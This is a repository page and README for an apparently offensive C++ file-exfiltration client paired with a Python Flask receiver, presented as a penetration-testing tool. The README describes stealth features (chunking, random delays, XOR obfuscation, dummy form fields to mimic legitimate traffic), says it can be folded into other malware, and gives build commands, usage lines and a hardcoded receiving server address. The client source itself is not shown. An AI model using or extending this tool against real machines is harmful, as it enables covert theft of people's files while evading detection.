https://github.com/leshenkazevnoski/exfiltrationtool

Data exfiltration tool for penetration testing and red team engagement
https://github.com/leshenkazevnoski/exfiltrationtool

cpp exfiltration tool

Last synced: over 1 year ago
JSON representation

Data exfiltration tool for penetration testing and red team engagement

• Host: GitHub
• URL: https://github.com/leshenkazevnoski/exfiltrationtool
• Owner: LeshenkaZevnoski
• Created: 2025-03-09T04:07:23.000Z (over 1 year ago)
• Default Branch: master
• Last Pushed: 2025-03-09T05:02:38.000Z (over 1 year ago)
• Last Synced: 2025-03-09T05:25:10.032Z (over 1 year ago)
• Topics: cpp, exfiltration, tool
• Language: C++
• Homepage:
• Size: 2.12 MB
• Stars: 0
• Watchers: 1
• Forks: 0
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# File Exfiltration Tool

## Overview

This project is to demonstrate a data exfiltration feature written in C++ with a Python-based server for a penetration testing engagement. This tool can also be intergrated into other malware funcitonalities. The tool allows you to exfiltrate files from a client machine to a remote server over HTTP, with options for chunking, delays, and type-specific processing. The tool supports various file types (e.g., `.txt`, `.png`, `.docx`, `.pdf`), with image files transferred without encryption for direct usability, while other types are XOR-encrypted for basic obfuscation.

### Features:

- File type detection and processing (e.g., no encryption for images).

- Optional chunking to split large files into smaller pieces.

- Optional random delays between chunks for stealth.

- Base64 encoding for HTTP transmission.

- Dummy form fields to mimic legitimate traffic.

- Simple Python Flask server to receive and reassemble files.

> **Disclaimer:** Unauthorized use for malicious purposes is illegal and unethical. I hold no responsibility for any misuse.

## Prerequisites

### Client (C++)

- **Operating System:** Windows (uses WinHTTP API).

- **Compiler:** MSVC (e.g., `cl` via Visual Studio) or MinGW (e.g., `g++`).

- **Libraries:** WinHTTP (included with Windows).

### Server (Python)

- **Operating System:** Any (tested on VM Windows/MacOS).

- **Python:** 3.6+.

- **Dependencies:** Flask (`pip install flask`).

- **Network:** Server must be reachable on port 80 (configurable).

## Setup

### Client

#### Clone the Repository:

```bash

git clone https://github.com/yourusername/file-exfiltration-tool.git

cd file-exfiltration-tool

```

#### Compile the C++ Code:

Using MSVC:

```bash

cl client.cpp /link winhttp.lib

```

Using MinGW:

```bash

g++ client.cpp -o client.exe -lwinhttp

```

**Output:** `client.exe`.

### Server

#### Install Dependencies:

```bash

pip install flask

```

#### Run the Server:

![MacOS screenshot](Images/MacOS.png)

1. Save the Python script as `app.py`.

2. Start it on the target machine (e.g., `192.168.2.214`):

   ```bash

   python server.py

   ```

3. Ensure port `80` is open and the server is reachable.

## Usage

![VM Windows screenshot](Images/VM_Windows.png)

### Client

Run the compiled executable with the following syntax:

```bash

client.exe  [-c] [-d]

```

- ``: Path to the file to exfiltrate (e.g., `image.png`, `doc.docx`).

- `-c`: Enable chunking (splits file into 1024-byte pieces).

- `-d`: Enable random delays (1–5 seconds between chunks, requires `-c`).

#### Examples:

Transfer a PNG file as a single piece:

```bash

client.exe image.png

```

Transfer a text file in chunks with delays:

```bash

client.exe notes.txt -c -d

```

**Output:**

- Logs bytes read, sent, and server response status.

- Success message: `"Data sent successfully to 192.168.2.214."`

### Server

- The server listens on `0.0.0.0:80` and saves received files as `exfiltrated_data.` (e.g., `exfiltrated_data.png`).

- Logs chunk reception and final file size.

#### Example Output:

```

Received chunk 1 of 3, size: 1368 bytes

Received chunk 2 of 3, size: 1368 bytes

Received chunk 3 of 3, size: 500 bytes

File fully received and saved as exfiltrated_data.png, size: 3236 bytes

```

## File Type Handling

- **Images** (`.png`, `.jpg`, `.jpeg`, `.bmp`): Transferred unencrypted.

- **Text** (`.txt`), **Office** (`.docx`, `.xlsx`), **PDF** (`.pdf`): XOR-encrypted with key `"mysecretkey"`.

- **Other Types**: Default to XOR encryption, saved with `.bin` extension if no extension is detected.

## Notes

- **Server IP:** Hardcoded to `192.168.2.214:80`. Modify `server_host` and `server_path` in `client.cpp` for a different target.

- **Chunk Size:** Fixed at `1024` bytes when chunking is enabled. Adjust `chunk_size` in `client.cpp` as needed.

- **Security:** XOR encryption is basic and not secure for real-world use; consider stronger methods for production.

## Troubleshooting

- **Empty Output File:** Check client/server logs for size mismatches or errors (e.g., `"WinHttpSendRequest failed: 12029"` = server unreachable).

- **Network Issues:** Ensure the server is running and reachable (`ping 192.168.2.214`, `telnet 192.168.2.214 80`).

- **Corrupted Images:** Verify original file integrity; test without chunking (`client.exe image.png`).

## Contributing

Feel free to fork this repository and submit pull requests with improvements (e.g., stronger encryption, more file type processors, configuration options).